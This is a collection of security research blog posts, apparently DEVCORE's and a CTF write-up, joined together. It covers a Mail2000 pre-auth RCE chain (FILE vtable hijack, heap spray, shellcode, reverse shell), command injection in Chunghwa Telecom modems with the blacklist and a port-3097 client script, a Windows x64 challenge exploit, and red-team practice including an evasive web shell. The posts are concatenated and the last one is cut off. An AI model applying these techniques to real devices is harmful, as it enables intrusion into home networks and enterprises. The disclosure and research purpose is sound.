Knowing the endpoint is a FILE operation, we can work backwards: which function is a FILE operation commonly used by CGIs, and which CGIs can serve as entry points, so that we can chain the full attack? We first studied the functions touching POST files and selected our target: MCGI_VarClear(). MCGI_VarClear() is called in many of the FILE-using CGIs; it is used to empty g_stCGIEnv before the program ends, including free()-ing dynamically allocated memory and closing every FILE, i.e. calling fclose(), which also means it can be hijacked through the vtable! We can use the out-of-bounds write to overwrite file_vec with pointers whose contents are HTTP request parameters, thereby forging POST files, like the structure below:

Our final goal is to point FILE* at the forged structure and hijack control flow through the fake vtable! Here a problem appears: we need to point FILE* at a location whose contents we control, but we do not actually know where to point it. This problem stems from a defense mechanism on Linux: ASLR.

Address Space Layout Randomization (ASLR)

ASLR causes the program to be loaded at a different random memory location on each execution; you can try running cat /proc/self/maps repeatedly and observe whether the memory addresses are the same each time. ASLR is enabled by default in most environments, so while writing an exploit you often face the awkward situation of being able to forge a pointer yet having nowhere to point it. The CGI architecture makes this an even bigger obstacle. Against a typical long-lived server, the attack flow might let you leak an address within one connection and use it for the next stage; under CGI, however, a leaked address cannot be used in subsequent attacks, because the CGI process exits once it finishes, and the next request gets a brand-new CGI! To deal with this problem, we ended up writing two exploits, with attack techniques differing according to the CGI binary.

Post-Auth RCE - /cgi-bin/msg_read

The entry point of the first exploit is a page that requires login; this program is larger and has more functionality. In this exploit we used heap spraying to overcome ASLR: filling the heap with a large number of identical objects, so that we have a high probability of landing on one of them. The sprayed content is a mass of pre-forged FILE structures, fake vtable included. From this binary we found a very practical gadget, i.e. a small code fragment:

xchg eax, esp; ret

The point of this gadget is that it lets us move the stack, and at that exact moment eax happens to point at content we control, so the entire stack contents can be forged; in other words, we can use ROP (Return-Oriented Programming)! So we placed the stack-pivot gadget and the follow-up ROP chain into the forged vtable and launched the ROP attack!

We can do ROP, so we can pop a shell, right? You would think so, but no: there is still one big problem, again caused by the aforementioned mitigation, ASLR. We do not have the address of system! The gadgets provided by this binary alone are not enough to open a shell, so we hoped to call system inside libc directly; but as mentioned earlier, memory addresses are randomized on every load, and we do not know the exact location of system! After carefully examining the program, we discovered something very peculiar: this binary nominally has NX enabled, the protection that makes writable segments non-executable, yet at runtime the stack's execute permission is actually turned on! Whatever the reason, this setup is extremely convenient for a hacker: we can use this executable region to place shellcode and run it, successfully getting a shell and achieving RCE!

However, this attack requires login, which is not enough for DEVCORE's perfection-seeking research team! So we dug further into other attack paths!

Pre-Auth RCE - /cgi-bin/cgi_api

After searching all the CGI entry points, we found one that requires no login and still calls MCGI_VarClear(): /cgi-bin/cgi_api. As the name suggests, it is just an API endpoint, so the program itself is very small, returning almost as soon as it finishes calling into the library, and consequently the stack-pivot gadget is no longer available. But since we already know the stack is executable, we can in fact skip the ROP step and place shellcode directly on the stack, exploiting a property of CGI: HTTP request variables are placed in environment variables, such as these common ones:

  • HTTP_HOST
  • REQUEST_METHOD
  • QUERY_STRING

Environment variables are in fact placed at the very end of the stack, i.e. in the executable region, so all we need is for the forged vtable to call straight into the shellcode!

Of course, the same problem appears again: we still do not have a stack memory address. At this point some people fall into the trap of believing an attack must land in one precise shot, a one-hit kill like a sniper; in reality it can look more like blasting the enemy away with a machine gun:

Think of it from another angle: this binary is 32-bit, so only 1.5 bytes of the address are random, giving 16^3 possible combinations, which means on average only about 4096 requests are needed to hit it once! With today's computers and network speeds that is a matter of a few minutes, so plain brute force is entirely feasible! Our final exploit flow is:

  1. Send a POST request to cgi_api
    • Put shellcode in QUERY_STRING
  2. Trigger the out-of-bounds write, overwriting file_vec
    • Stage the forged FILE & vtable in the overflowing parameters
  3. cgi_api calls MCGI_VarClear before it exits
  4. Jump to the shellcode location via the vtable and establish a reverse shell

In the end we successfully built a pre-auth RCE chain, and this exploit is not affected by differences between binary versions! Real-world cases also proved its feasibility: in one exercise we used this Mail2000 1-day as the breakthrough point, successfully leaked the target's VPN data, and penetrated further into the intranet!

The Fix

This vulnerability was fixed in Mail2000 V7 Patch 050, released on 2018/05/08. The patch IDs are OF-ISAC-18-002 and OF-ISAC-18-003.

Postscript

Finally, let's talk about the attitude vendors should take toward vulnerabilities like these. As a product vendor, Openfind handled this disclosure in several ways worth learning from:

  • Open mindset
    • Proactively provided a test environment
  • Actively fixed the vulnerability
    • Faced the vulnerability with a positive, constructive attitude and handled it quickly
    • Verified the fix together with the reporter after patching
  • Took customer security seriously
    • Released a critical update, proactively notified customers, and assisted with upgrades

In truth, products having vulnerabilities is normal and hard to avoid, and our research team plays the role of a helper: by reporting vulnerabilities we hope to assist enterprises, raise security awareness, and lift Taiwan's overall security level! We hope vendors face vulnerabilities with a constructive attitude instead of dodging and evading, which only puts their users at greater security risk!

Users of such equipment should likewise keep a firm grip on their own assets. Firewalls, servers, and similar products are not done once they are bought and deployed; proper asset inventory and tracking of vendors' security updates is how you keep products safe from 1-day attacks. Regular penetration testing and red team exercises can further help an enterprise clarify whether it has blind spots or deficiencies, and improve them to reduce its security risk.

You Use It to Get Online; I Use It to Get Into Your Intranet! Remote Code Execution on Chunghwa Telecom Modems

10 November 2019 at 16:00

Hi, I'm Orange! This article is the topic I shared at DEVCORE CONFERENCE 2019: how we went, step by step, from a single Chunghwa Telecom configuration mistake to a vulnerability chain that can control hundreds of thousands, perhaps even millions, of home modems!


Foreword

As DEVCORE's research team, our job is to study the latest attack trends, hunt for new weaknesses, and find vulnerabilities that can affect the whole world, reporting them to vendors so that they do not flow into underground black markets and get abused by black-hat hackers or even state-sponsored groups, making this world a safer place!

Making "vulnerability research" your job has long been the dream of many security enthusiasts, but most people only see the glamour of publishing a vulnerability or standing on a conference stage, without noticing the hard work behind it. In reality, vulnerability research is very often a plain, unglamorous, and tedious process.

Bug hunting is not like Capture the Flag (CTF), where a vulnerability and a correct solution are guaranteed to exist, waiting for you to solve; within a challenge's limited scope, you can usually infer the author's intent from the available conditions and clues nine times out of ten. There are of course fresh, high-quality, brutally hard competitions such as HITCON CTF or Plaid CTF, but "finding a vulnerability" and "exploiting a vulnerability" are fundamentally two different things!

CTF is well suited to sharpening the skills of people who already have some foundation, but the downside is that staying inside those constrained little boxes for too long can easily limit your thinking and horizons; real-world offense and defense are messier and larger in every dimension! Digging a new weakness out of a mature product that has been in use for years and is watched by security researchers worldwide is, as you can imagine, absolutely not easy! A CTF competition lasts at most 48 hours, but without even knowing whether the target has a vulnerability at all, how long can you persist?

In our previous research, we found pre-auth remote code execution vulnerabilities in three well-known SSL VPN vendors. The results were rich, but they cost the whole research team half a year (closer to a year including the follow-up handling), including two initial months of zero output, with nothing found, before we pushed through. So a good vulnerability researcher needs not only overall capability, broad exposure, and the ability to dig deep, but also independent thinking and enough passion to withstand the loneliness, in order to cut a path through such high-difficulty challenges!

Vulnerability research is rarely a money-making line of business, yet it is a department a company cannot afford not to invest in. How many companies can allow employees to spend half a year, even a full year, on research that may produce nothing? Let alone report the results to vendors unconditionally, just to make the world safer? This is precisely why DEVCORE outperforms others in penetration testing and red team operations: besides the arsenal accumulated day to day, when we encounter a vulnerability we do everything we can to maximize its impact, using a hacker's mindset and all kinds of combined techniques to push a low-risk bug to the extreme, which is exactly how real-world attackers would attack you!


Scope of Impact

The story goes back to a day earlier this year, when DEVCORE's intelligence center detected a large number of network addresses across Taiwan with port 3097 open. Interestingly, these were not server addresses but ordinary home computers. Normally, a home computer connects to the Internet through a modem and exposes no services externally at all; even the modem's SSH and HTTP management interfaces are reachable only from the internal network. We therefore suspected this was related to an ISP misconfiguration! We also successfully found a pre-auth remote code execution vulnerability on this port! To put it in perspective: it is as if the hacker were already sleeping on the couch in your living room!

With this vulnerability we can:

  1. Sniff network traffic and steal online identities, PTT passwords, even your credit card data
  2. Hijack updates, run watering-hole attacks, and use internal relay attacks to control your computer or even your phone
  3. Combine it with red team operations to bypass developers' various allow-list policies
  4. And much more…

The related CVE IDs are:

Compared with past attacks on home modems, the impact this time is far more severe! Previously, however serious a vulnerability was, as long as the home modem exposed no ports externally, an attacker could not use it. This time, however, the vulnerability is combined with Chunghwa Telecom's misconfiguration, leaving your home modem naked on the Internet: an attacker "merely needs to know your IP to enter your home network directly, with no preconditions at all". And since ordinary users have no control over the modem, this attack is something they can neither defend against nor patch!

After a full IPv4 scan, about 250,000 modems in Taiwan have this problem, "meaning at least 250,000 households are affected". Note that "only modems online at the time of scanning were counted", so the actual number of affected users must be higher than this figure!

Reverse lookups of the network addresses show that as many as ninety percent of the affected users are on Chunghwa Telecom dynamic IPs, while the remaining ten percent include fixed-line IPs and other telecom companies. Why other telecoms? Our understanding is that Chunghwa Telecom, as Taiwan's largest carrier, holds resources and hardware infrastructure far beyond other carriers, so in some remote areas the last mile from another carrier to the user may still run over Chunghwa Telecom equipment! Since we are not the vendor, we cannot obtain the complete list of affected modem models, but this author is a victim too ╮(╯_╰)╭, so we can confirm that the most widely used Chunghwa Telecom fiber GPON modem is within the affected range!

(Image from the Internet)


Vulnerability Hunting

A configuration mistake alone is not that big a deal, so next we hoped to find a more severe vulnerability in this service! Depending on the availability of source code, executables, and API documentation, software vulnerability hunting can be divided into:

  • Black-box testing
  • Gray-box testing
  • White-box testing

With nothing at all in hand, you can only rely on experience and understanding of the system to guess the implementation behind each command and find the flaws.

Black-box testing

Port 3097 provides many commands related to the telecom network; we infer it is a debug interface Chunghwa Telecom gives its engineers for remotely configuring all kinds of network settings on the modem!

The HELP command lists all features, among which we spotted one named MISC, seemingly a bucket for commands that fit nowhere else, and one of its subcommands, SCRIPT, caught our attention! Its argument is a filename, and when executed it appears to run the file as a shell script; but without being able to place a controllable file on the remote machine first, we could not use this command to achieve arbitrary code execution. Interestingly, though, MISC SCRIPT displays STDERR, so we could abuse this behavior to achieve arbitrary file reads!
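A debug service like this can be driven with a plain TCP client. The sketch below is a hypothetical Python client for port 3097; the CRLF framing and the read-until-timeout handling are assumptions on my part, not the documented protocol:

```python
import socket

def frame(cmd: str) -> bytes:
    # CRLF line termination is an assumption about the command framing.
    return cmd.encode() + b"\r\n"

def send_cmd(host: str, cmd: str, port: int = 3097, timeout: float = 5.0) -> str:
    """Send one command (e.g. "HELP" or "MISC SCRIPT /etc/passwd") and
    read whatever the service returns until the connection goes quiet."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(frame(cmd))
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
        return b"".join(chunks).decode("utf-8", errors="replace")
```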


From black box to gray box

In exploitation, whether memory corruption or network penetration, everything revolves around obtaining three permissions on the target: Read, Write, and eXecute. We now have our first Read primitive; what next?

The debug interface appears to run under a high-privilege user, so we can directly read the system password file and obtain the password hash for the system's administrative login!

By cracking the root user's password hash, we successfully logged into the modem over SSH, turning the "black box" into a "gray box"! Although we can now control our own modem, ordinary home modems do not expose SSH externally; to "remotely" control other people's modems, we still had to find a way to gain code execution from the 3097 service.

The entire Chunghwa Telecom modem is an embedded Linux system running on a MIPS processor architecture, and the 3097 service is handled by a binary at /usr/bin/omcimain. The file is nearly 5 MB, which is no small amount for reverse engineering, but compared with black-box testing, at least now there is something to analyze. Wonderful!

$ uname -a
Linux I-040GW.cht.com.tw 2.6.30.9-5VT #1 PREEMPT Wed Jul 31 15:40:34 CST 2019
[luna SDK V1.8.0] rlx GNU/Linux

$ netstat -anp | grep 3097
tcp        0      0 127.0.0.1:3097          0.0.0.0:*               LISTEN

$ ls -lh /usr/bin/omcimain
-rwxr-xr-x    1 root   root        4.6M Aug  1 13:40 /usr/bin/omcimain

$ file /usr/bin/omcimain
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), dynamically linked


From gray box to white box

Now we can use reverse engineering to understand the principle and implementation behind each command! First, though, reverse engineering is a painful and tedious process: even a tiny program can contain tens of thousands, even over a hundred thousand, lines of assembly, so the bug-hunting strategy becomes very important! Judging from the feature set, command-injection-style vulnerabilities seemed likely, so we started digging from the feature implementations!

The processing core of the 3097 service is essentially a multi-level IF-ELSE dispatch; each little block corresponds to the implementation of one feature, e.g. cli_config_cmdline corresponds to the CONFIG command. So, guided by the hints from the HELP command, we dug into each feature implementation one by one!

After researching for a while, we had not found anything serious :( But we noticed that when all commands fail to match, execution enters a function called with_fallback, whose main purpose is to append the unmatched command to /usr/bin/diag and continue executing it!

The rough logic of with_fallback is below; since Ghidra had not yet appeared at the time, this source was slowly reconstructed by reading the MIPS assembly! Here s1 is the input command: if the command is not in the predefined list and the command contains no question mark, it is concatenated with /usr/bin/diag and passed to system for execution! Naturally, to prevent command injection and related weaknesses, the input is first checked against the BLACKLISTS list for harmful characters before reaching system.

  char *input = util_trim(s1);
  if (input[0] == '\0' || input[0] == '#')
      return 0;

  while (SUB_COMMAND_LIST[i] != 0) {
      sub_cmd = SUB_COMMAND_LIST[i++];
      if (strncmp(input, sub_cmd, strlen(sub_cmd)) == 0)
          break;
  }

  if (SUB_COMMAND_LIST[i] == 0 && strchr(input, '?') == 0)
      return -10;

  // ...

  while (BLACKLISTS[i] != 0) {
      if (strchr(input, BLACKLISTS[i]) != 0) {
          util_fdprintf(fd, "invalid char '%c' in command\n", BLACKLISTS[i]);
          return -1;
      }
      i++;
  }

  snprintf(file_buf,  64, "/tmp/tmpfile.%d.%06ld", getpid(), random() % 1000000);
  snprintf(cmd_buf, 1024, "/usr/bin/diag %s > %s 2>/dev/null", input, file_buf);
  system(cmd_buf);


BLACKLISTS is defined as follows:

char *BLACKLISTS = "|<>(){}`;";

If it were you, could you think of a way to bypass it?






The answer is simple: command injection is often just this simple and unremarkable!
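The blacklist can also be checked mechanically. The sketch below replays the filter in Python and lists some common shell metacharacters it does not cover; the article shows the actual character used only in a screenshot, so treat these merely as candidates:

```python
# Replay of the character blacklist from with_fallback (sketch).
BLACKLIST = "|<>(){}`;"

def is_blocked(cmd: str) -> bool:
    """Mimics the strchr() loop: reject if any blacklisted char appears."""
    return any(c in cmd for c in BLACKLIST)

# Shell metacharacters the filter does NOT cover; which one the exploit
# actually relied on is not stated in the text.
candidates = ["\n", "&", "$", "'", '"', "\\"]
survivors = [c for c in candidates if not is_blocked(c)]
```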


Here we demonstrate going from learning a victim's IP address on PTT to entering their modem, achieving a true "strike wherever we point"!



Postscript

The story is more or less at its end here. The whole article may read like a breezy account of a vulnerability's journey from discovery to exploitation, and judged purely by the result it may be just a simple command injection, but the time spent in between and the dead ends walked along the way are beyond what you, the reader, can imagine. It is like walking a maze in the dark: until you are out of the maze, you never know whether the path you are currently on is the correct road to the destination!

Finding new vulnerabilities is not easy, especially today when the various attack techniques have already matured; coming up with brand-new attack techniques is harder still! In the field of vulnerability research, Taiwan does not yet have enough capacity. If everyday challenges can no longer satisfy you and you want to experience real-world offense and defense, come join us and hang out :D


Disclosure Timeline

  • 2019-07-28 - Reported to Chunghwa Telecom via TWCERT/CC
  • 2019-08-14 - Vendor replied that it was inventorying and patching devices
  • 2019-08-27 - Vendor replied that patching would be completed in early September
  • 2019-08-30 - Vendor replied that firmware updates for affected devices were complete
  • 2019-09-11 - Vendor replied that some users require on-site updates; public disclosure postponed
  • 2019-09-23 - Confirmed with TWCERT/CC that disclosure was OK
  • 2019-09-25 - Presented at DEVCORE CONFERENCE 2019
  • 2019-11-11 - Blog post released

BFS Ekoparty 2019 Exploitation Challenge - Override Banking Restrictions to get US Dollars

27 October 2019 at 10:48

FROM CRASH TO CODE EXECUTION

This is my first attempt at Windows x64 exploitation, and at the challenges offered by Blue Frost Security.

I decided to give the 2019 BFS Exploitation Challenge a try. It is a Windows 64-bit executable for which an exploit is expected to work under Windows 10 Redstone 6.

The Rules

  1. Bypass ASLR remotely
  2. 64-bit version exploitation
  3. Remote Execution

Initial Steps

We were given only a Windows binary. That made me think: I cannot start with any fuzzing technique, because I do not yet know whether the target is local or remote. Let's do some reverse engineering first, so I can understand what it is really doing.

Navigating through the main function, we notice that it is a remote application listening on port 54321.

server

Identifying the Vulnerability

Disassembling the function, it is obvious that some checks need to be bypassed in order to send our payload correctly.

checks

  1. if ( v6 == 16i64 )
  2. if ( *(_QWORD *)buf == 0x393130326F6B45 )
  3. strcpy(buf, "Eko2019");
  4. if ( size_data <= 512 )
  5. if ( (signed int)size_data % 8 )

The first validation checks that our initial message is exactly 16 bytes. Next, buf must equal 0x393130326F6B45, which is the string "Eko2019" stored in memory. A strcpy then copies "Eko2019" over the start of our payload. There is also a size validation: we cannot send more than 512 bytes, and the size must be 8-byte aligned, meaning we can send 8, 16, 24, and so on.

The jle instruction indicates a signed integer comparison, but the size is later used as unsigned, which gives us an integer overflow.
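The signed/unsigned mismatch can be reproduced outside the binary. This Python sketch reinterprets an attacker-chosen 32-bit length the way a signed jle check would see it; the value 0xFFFFFFF8 is just an illustrative example (in C it would also pass the alignment test, since (-8) % 8 == 0):

```python
import struct

def as_signed32(u: int) -> int:
    """Reinterpret a 32-bit unsigned value as signed, as a jle check would."""
    return struct.unpack("<i", struct.pack("<I", u & 0xFFFFFFFF))[0]

size = 0xFFFFFFF8                  # hypothetical attacker-supplied length field
assert as_signed32(size) <= 512    # passes the signed "size_data <= 512" check
assert size > 512                  # yet used as an unsigned size it is enormous
```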

checks

After we successfully sent a larger payload, I noticed it crashes after sending 229 bytes. Shortly before the crash there is an instruction lea rcx, unk_7FF6A8A9E520; but what is unk_7FF6A8A9E520 holding or doing? Inspecting unk_7FF6A8A9E520 more deeply, we found an array of 256 entries with this structure:

array_ret

The function sub_7FF6A8A91000 will return our byte + 488B01C3C3C3C3h, in this case 41 48 8B 01 C3 C3 C3 C3.

This value is then used as the buffer in WriteProcessMemory(v2, sub_7FF7DD111000, &Buffer, 8ui64, &NumberOfBytesWritten);, which writes those bytes over sub_7FF7DD111000 as instructions, allowing us to control what executes when that function is reached.

overwrite

We can see that rax and rcx were overwritten; however, only the lowest byte of rax was overwritten, while rcx was overwritten completely, causing an access violation.

.text:00007FF7DD111000 arg_0= qword ptr  8
.text:00007FF7DD111000
.text:00007FF7DD111000 db      42h
.text:00007FF7DD111000 mov     rax, [rcx]
.text:00007FF7DD111004 retn

why does this happen?

there's a reason:

  1. the pointer value in RCX is under our control

Strategy

In order to bypass ASLR, we need the server to leak an address that belongs to its process space. Fortunately, there is a call to the send() function which sends 8 bytes of data, exactly the size of a pointer in 64-bit land. That should serve our purpose just fine.

          qword_7FF7DD11D4E0 = printf(aRemoteMessageI, (unsigned int)counter_conection, &Dst);
          ++counter_conection;
          Buffer = what_the_heck_do(array[byte % -256]);
          v2 = GetCurrentProcess();
          WriteProcessMemory(v2, sub_7FF7DD111000, &Buffer, 8ui64, &NumberOfBytesWritten);
          *(_QWORD *)v3 = sub_7FF7DD111000(v9);
          send(s, v3, 8, 0);
          result = 1i64;

The strategy is to get control of the "byte" variable. Luckily, it is a stack variable adjacent to the "size_data[512]" buffer, so by overflowing the buffer we can select a gadget other than the default one at index 62 (0x3e).

I wrote a simple script to find gadgets in order to leak data from the running process:

for i in $(cat file); do echo -e "\n$i" && rasm2 -b 64 -D $i;done

After some time researching how to read information about the running process, I found that I could read via gs (the segment register), since we are on x64:

0x65488B01C3C3C3C3
0x00000000   4                 65488b01  mov rax, qword gs:[rcx]
0x00000004   1                       c3  ret
0x00000005   1                       c3  ret
0x00000006   1                       c3  ret
0x00000007   1                       c3  ret

So this special register leads us to the _PEB: the PEB pointer sits at offset +0x060 (ProcessEnvironmentBlock : Ptr64 _PEB), as shown by dt ntdll!_TEB.

Preparing our Exploit

Leaking the PEB

  1. 0x65 = mov rax, qword gs:[rcx]
  2. 0x060 = _PEB
WINDBG>dt ntdll!_TEB
   +0x000 NtTib            : _NT_TIB
   +0x038 EnvironmentPointer : Ptr64 Void
   +0x040 ClientId         : _CLIENT_ID
   +0x050 ActiveRpcHandle  : Ptr64 Void
   +0x058 ThreadLocalStoragePointer : Ptr64 Void
   +0x060 ProcessEnvironmentBlock : Ptr64 _PEB
   +0x068 LastErrorValue   : Uint4B
   +0x06c CountOfOwnedCriticalSections : Uint4B
   +0x070 CsrClientThread  : Ptr64 Void
   +0x078 Win32ThreadInfo  : Ptr64 Void
   +0x080 User32Reserved   : [26] Uint4B

In order to make our exploit leak the data, we need to find a way to dereference rcx with our _PEB offset, so we can leak the PEB address and then start leaking data to bypass ASLR.

leak_peb
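On the client side, the 8 bytes coming back from send() are just a little-endian qword, i.e. whatever ended up in RAX. A sketch of the receive path (socket handling omitted; `parse_leak` is a hypothetical helper name, and the example pointer value is made up):

```python
import struct

def parse_leak(data: bytes) -> int:
    # the server does send(s, v3, 8, 0) with the qword produced by the stub,
    # so the leaked pointer arrives as a little-endian uint64
    assert len(data) == 8
    return struct.unpack("<Q", data)[0]

# with the 0x65 prefix and rcx = 0x60, the stub executes
# mov rax, gs:[0x60] and the reply is the PEB address
assert parse_leak(bytes.fromhex("00304F9DD6000000")) == 0x000000D69D4F3000
```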

Leaking the ImageBaseAddress

WINDBG>dt ntdll!_PEB
   +0x000 InheritedAddressSpace : UChar
   +0x001 ReadImageFileExecOptions : UChar
   +0x002 BeingDebugged    : UChar
   +0x003 BitField         : UChar
   +0x003 ImageUsesLargePages : Pos 0, 1 Bit
   +0x003 IsProtectedProcess : Pos 1, 1 Bit
   +0x003 IsImageDynamicallyRelocated : Pos 2, 1 Bit
   +0x003 SkipPatchingUser32Forwarders : Pos 3, 1 Bit
   +0x003 IsPackagedProcess : Pos 4, 1 Bit
   +0x003 IsAppContainer   : Pos 5, 1 Bit
   +0x003 IsProtectedProcessLight : Pos 6, 1 Bit
   +0x003 IsLongPathAwareProcess : Pos 7, 1 Bit
   +0x004 Padding0         : [4] UChar
   +0x008 Mutant           : Ptr64 Void
   +0x010 ImageBaseAddress : Ptr64 Void   <-- this is the value we want to leak next
   +0x018 Ldr              : Ptr64 _PEB_LDR_DATA
   +0x020 ProcessParameters : Ptr64 _RTL_USER_PROCESS_PARAMETERS
   +0x028 SubSystemData    : Ptr64 Void
   +0x030 ProcessHeap      : Ptr64 Void
   +0x038 FastPebLock      : Ptr64 _RTL_CRITICAL_SECTION
   +0x040 AtlThunkSListPtr : Ptr64 _SLIST_HEADER
   +0x048 IFEOKey          : Ptr64 Void
   +0x050 CrossProcessFlags : Uint4B
   ....snip
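With the PEB address in hand, the second leak repeats the trick with the plain `mov rax, [rcx]; ret` stub and rcx pointed at PEB+0x10. The offsets chain together as follows (a sketch; the offsets come from the WinDbg dumps above, while the static base used in `rebase` is only an illustrative assumption):

```python
TEB_PEB_OFF = 0x60          # TEB +0x060 ProcessEnvironmentBlock
PEB_IMAGEBASE_OFF = 0x10    # PEB +0x010 ImageBaseAddress

def next_read(peb: int) -> int:
    # value to load into rcx for the second leak: &PEB.ImageBaseAddress
    return peb + PEB_IMAGEBASE_OFF

def rebase(image_base: int, static_addr: int,
           static_base: int = 0x7FF6A8A90000) -> int:
    # once ImageBaseAddress is leaked, any function address is the leaked
    # base plus its static offset (e.g. the RVA of sub_7FF6A8A91000)
    return image_base + (static_addr - static_base)

assert next_read(0xD69D4F3000) == 0xD69D4F3010
assert rebase(0x7FF700000000, 0x7FF6A8A91000) == 0x7FF700001000
```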

Code execution

overwrite

The Evolution of the DEVCORE Red Team, and What's Next

23 October 2019 at 16:00

Introduction

"Red team assessments" have gradually become a topic of discussion in recent years, and some vendors have begun offering red team services. However, few have publicly shared how red teaming is actually done in Taiwan. As the first company to offer red team assessments in Taiwan, I would like to share, based on more than two years of hands-on experience, why we do red teaming, the problems we have faced, and the qualities we believe a red team member should have. Finally, I will share the enterprise security problems we currently see, in the hope that red team assessments can help enterprises address them in the future.

This is the topic I presented at DEVCORE CONFERENCE 2019. In the pre-conference survey, some friends said they would like us to introduce the DEVCORE red team, how it operates, and some case studies, so I pulled together some material into this talk. The slides are linked below; some internal system screenshots are not public and were only shared at the conference, so please bear with us.

The Evolution of the DEVCORE Red Team, and What's Next - Shaolin (DEVCORE CONF 2019)

Why Red Team Assessments?

In a word: we gradually came to realize that, for large enterprises, a plain penetration test is not the most cost-effective option. In over a hundred penetration tests, we were often able to find serious weaknesses at the enterprise perimeter during the early reconnaissance phase, then enter the intranet and bypass layers of defenses to attack the primary target. The bigger the enterprise, the more obvious this becomes: they usually have many external websites and network devices, each of which can be a risk. Even if the main website is well protected, an attacker only needs to find one problem among all those targets to hurt the enterprise. And even if the enterprise runs an independent penetration test on every single service, in the real world it can still be compromised via third-party services, the vendor supply chain, social engineering, and so on. So it is possible to pour a lot of resources into testing and still suffer a security incident.

So we launched red team assessments, hoping that realistic exercises would help enterprises find the weak spots in their overall architecture. This service therefore focuses on the security of the enterprise as a whole, not just a single website.

The goal of a red team assessment is usually a scenario, for example: can a hacker obtain citizens' personal data, or even credit card numbers? During the exercise, the red team tries by every means available to verify whether the scenario the enterprise cares about could actually happen. In the example above, we would look for a path to the database storing that information, to verify whether the personal data and card numbers can be obtained. Card numbers are normally encrypted, so after taking the database we would also try to see whether they can be recovered. Sometimes, besides finding a way to recover them, we discover other paths to the card numbers along the way: perhaps an engineer's debug output logs card numbers, or a backup file on a NAS contains full card numbers. These may be things even the security lead does not know about, and they are blind spots in the enterprise's risk assessment.

At this point the value of a red team assessment should be clear: the red team helps the enterprise assess its major potential risks holistically, instead of testing a particular website from a single angle as in the past. Beyond finding weaknesses, the red team cares about verifying that an intrusion is actually feasible, which helps the enterprise assess risk and plan its defensive strategy. Finally, the red team can often uncover things the enterprise's risk assessment overlooked, such as the backup NAS in the example above, which may be a server that was never listed as a core system yet is critically important. This is where DEVCORE has genuinely helped customers over the past few years.

How the DEVCORE Red Team Is Organized

Basically, every member of the DEVCORE red team can operate independently, and on ordinary projects there is no significant difference between members. But when the scope of an exercise is large, a clear division of labor kicks in, and each group specializes to increase the team's efficiency. We are currently organized into five groups:

A brief description of their duties:

  • Intelligence (reconnaissance): responsible for intelligence gathering. They collect everything related to the target, including IP ranges, the technologies each website uses, and even leaked credentials.
  • Special Force (assault): the strongest offensive capability, mainly responsible for breaking the status quo, e.g. taking the first foothold, taking another network segment, or escalating privileges on a host.
  • Regular Army (regulars): after a foothold is taken, they sweep the battlefield and attempt lateral movement, establishing as many footholds as possible so the assault group has more resources to push toward the mission objective.
  • Support: the crucial logistics work, keeping footholds available while observing and recording the whole battle; they have the clearest picture of the overall situation.
  • Research: in peacetime they research the techniques a red team needs; during an exercise, when a strategically valuable system shows up, they invest resources in mining 0-days.

How the DEVCORE Red Team Evolved

Evolution means we hit problems and found ways to strengthen ourselves and solve them. So what problems did we run into?

How do we find an initial foothold?

This is the problem everyone runs into most often. Getting started is the hardest part: how do you find the first way in? It is even harder in a red team assessment, because enterprises of any scale have already invested in security testing and protection. How do we find a weakness among layers of defense? To find weaknesses others cannot, our testing mindset and methods have to be different. So we invested in the reconnaissance, assault, and research groups: the reconnaissance group studied different recon methods and sources and built our own tooling to make recon more efficient; the assault group kept strengthening its offensive capabilities; and most importantly, we had our researchers study the targets we encounter most often and build the tools and techniques the red team needs.

I would especially like to share the research group's results. We mine 0-days in infrastructure, and after responsible disclosure we use the resulting 1-days in our exercises; this model is quite rare even among red teams abroad. To be useful to the red team, the research group usually targets common services reachable from an enterprise's perimeter, such as mail servers, Jenkins, and SSL VPNs. We prioritize vulnerabilities that require no authentication and yield control of the server. Publicly disclosed results so far include: Exim, Jenkins, Palo Alto GlobalProtect, FortiGate, and Pulse Secure. These results have enormous strategic value during an exercise; you could even say that controlling these servers amounts to indirectly controlling most of the enterprise.

This research has also, unexpectedly, drawn attention from abroad:

  • Winner of PortSwigger's Top 10 Web Hacking Techniques two years in a row (2017, 2018)
  • Presented at DEF CON & Black Hat USA three years in a row (2017, 2018, 2019)
  • The first from Taiwan to win a PWNIE AWARD: Pwnie for Best Server-Side Bug (nominated 2018, won 2019)

With tens of thousands of targets, how does the red "team" stay effective?

With the results of the reconnaissance, assault, and research groups we got our entry point. The next problem: in our past experience, the scope of an exercise has repeatedly been tens of thousands of machines. How do we make teamwork actually pay off? The problem is one of scale: with only ten websites in scope it is easy to pick targets, but once the number of sites grows it becomes hard to mark and discuss which targets to attack. And when everyone syncs up, each person has so much progress that there is no good place to share server information so others can pick up a task.

We used to use a Trello-like system to record the state of each server. It was convenient when the scope was small, but became unwieldy as soon as the volume of data grew.

So we built our own system to solve these problems. Some of the principles we considered essential when designing it:

  • The server list must support tags, sorting, and full-text search; servers under concentrated fire must automatically surface prominently, saving search time.
  • It must automatically build host relationship diagrams, making it easy for the team to discuss the state of the battle.
  • Store structured information instead of the plain strings we used before, e.g. the services a machine runs, how we got a shell, and the credentials already compromised, making it easy to see current progress and to analyze afterwards.
  • Provide a shell console so members can get an interactive shell with one click.

There was one more problem: with so many red team members spread across the battlefield, wouldn't recording everything we did be terribly complicated? So we also wrote plugins that record our web attack traffic and the commands we run in shells together with the servers' responses; these records are even more detailed than the customer's access_log and bash_history. In addition, for each target server we specifically record the important actions taken on it, e.g. what settings were changed and what files were added or removed, which makes tracking easier for us and for the customer. Maintaining this kind of customized record keeping is tedious, especially for hackers used to automating everything, but we insist on it. Even when the customer does not ask for it, we faithfully record every step, just in case.

What if the enterprise has defensive devices or mechanisms?

Having solved the foothold and collaboration problems, we faced a third problem: enterprises have defenses! At the conference I presented several real, fairly customized defense cases, showing that beyond the common defensive appliances we also have plenty of experience going up against defensive mechanisms. We study the characteristics of each defense in order to bypass or exploit it, and even write tools to evade detection. A recent classic is a web shell our team built for Windows servers: the WAF cannot catch it, antivirus cannot catch it, and it leaves no eventlog entries, letting us silently collect the data we need from a server. Of course, we are not invincible; some lower-level detection mechanisms still cannot be bypassed. Our current operating principle is this: against server-side defenses, whatever can be hidden, we hide absolutely; whatever cannot be evaded, we optimize our workflow for speed, e.g. escalate privileges and grab the key data within five minutes. Even if we get caught, it does not matter, because the data we came for is already in hand.

Qualities a Red Team Member Should Have

